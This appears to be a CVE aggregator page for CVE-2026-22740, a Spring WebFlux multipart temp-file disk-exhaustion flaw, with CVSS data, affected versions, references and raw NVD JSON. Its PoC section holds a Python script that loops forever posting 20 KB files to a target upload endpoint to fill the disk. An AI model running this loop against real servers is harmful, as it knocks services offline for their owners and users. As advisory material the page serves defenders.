CVE-2026-22740

Description

A WebFlux server application that processes multipart requests creates temp files for parts larger than 10 K. Under some circumstances, temp files may remain not deleted after the request is fully processed. This allows an attacker to consume available disk space. Older, unsupported versions are also affected.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

Configurations (Affected Products)

cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:* - VULNERABLE

Spring Framework (受影响的支持版本)

Spring Framework (旧版不受支持版本)

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

# Target URL
url = 'http://target-server/upload'

# Generate data larger than 10KB to trigger temp file creation
data = {'file': ('large_file.tmp', 'A' * 20000, 'application/octet-stream')}

print("Starting DoS attack by consuming disk space...")

try:
    while True:
        # Send multipart request repeatedly
        response = requests.post(url, files=data)
        print(f"Request sent. Status: {response.status_code}")
except KeyboardInterrupt:
    print("Attack stopped.")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-22740
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-22740
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-22740/
[4] VulDB https://vuldb.com/cve/CVE-2026-22740
[5] https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H&version=3.1
[6] https://spring.io/security/cve-2026-22740

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-22740", "sourceIdentifier": "[email protected]", "published": "2026-04-29T12:16:18.333", "lastModified": "2026-05-04T14:51:28.313", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A WebFlux server application that processes multipart requests creates temp files for parts larger than 10 K. Under some circumstances, temp files may remain not deleted after the request is fully processed. This allows an attacker to consume available disk space.\n\nOlder, unsupported versions are also affected."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-400"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.3.48", "matchCriteriaId": "23C9BFA0-DDE5-4E6D-A9E0-ECC236913DF3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.1.0", "versionEndExcluding": "6.1.27", "matchCriteriaId": "FC58C148-219F-4868-B9F0-E0AF4435EF79"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.2.0", "versionEndExcluding": "6.2.18", "matchCriteriaId": "F317C66F-752D-40A9-AECF-5D1E51368AFE"}, {"vulnerable": true, "criteria": "cpe:2.3:a:vmware:spring_framework:*:*:*:*:*:*:*:*", "versionStartIncluding": "7.0.0", "versionEndExcluding": "7.0.7", "matchCriteriaId": "78C5C95C-1A83-40E7-8C73-D5965E20BD06"}]}]}], "references": [{"url": "https://nvd.nist.gov/vuln-metrics/cvss/v3-calculator?vector=AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H&version=3.1", "source": "[email protected]", "tags": ["US Government Resource"]}, {"url": "https://spring.io/security/cve-2026-22740", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}